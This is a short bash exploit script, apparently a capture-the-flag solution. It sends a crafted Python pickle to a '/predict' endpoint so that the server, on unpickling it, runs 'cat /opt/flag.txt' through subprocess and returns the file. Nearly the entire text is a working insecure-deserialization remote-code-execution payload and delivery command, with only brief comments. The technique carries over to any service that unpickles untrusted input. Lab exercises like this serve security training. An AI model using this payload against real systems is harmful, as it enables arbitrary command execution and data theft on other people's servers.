#!/usr/bin/env bash
set -euo pipefail

TARGET="${1:-http://127.0.0.1:8080}"
PREDICT="${TARGET%/}/predict"

echo "[exploit] target -> ${TARGET}"

# build a payload that, when unpickled, runs `cat /opt/flag.txt` and returns its bytes.
# The payload uses the pickle reduce protocol to call subprocess.check_output on ["cat","/opt/flag.txt"].
b64_payload=$(python - <<'PY'
import pickle, base64, subprocess
class R:
    def __reduce__(self):
        import subprocess
        return (subprocess.check_output, (["cat","/opt/flag.txt"],))
# pickle dump
payload = pickle.dumps(R())
print(base64.b64encode(payload).decode())
PY
)

echo "[exploit] sending payload to ${PREDICT}"
curl -s -X POST "${PREDICT}" -H "Content-Type: application/json" \
  -d "{\"data\":\"${b64_payload}\"}" | jq -C .

echo
echo "[exploit] done. If the server unpickled the payload, it will have executed 'cat /opt/flag.txt' and returned the flag."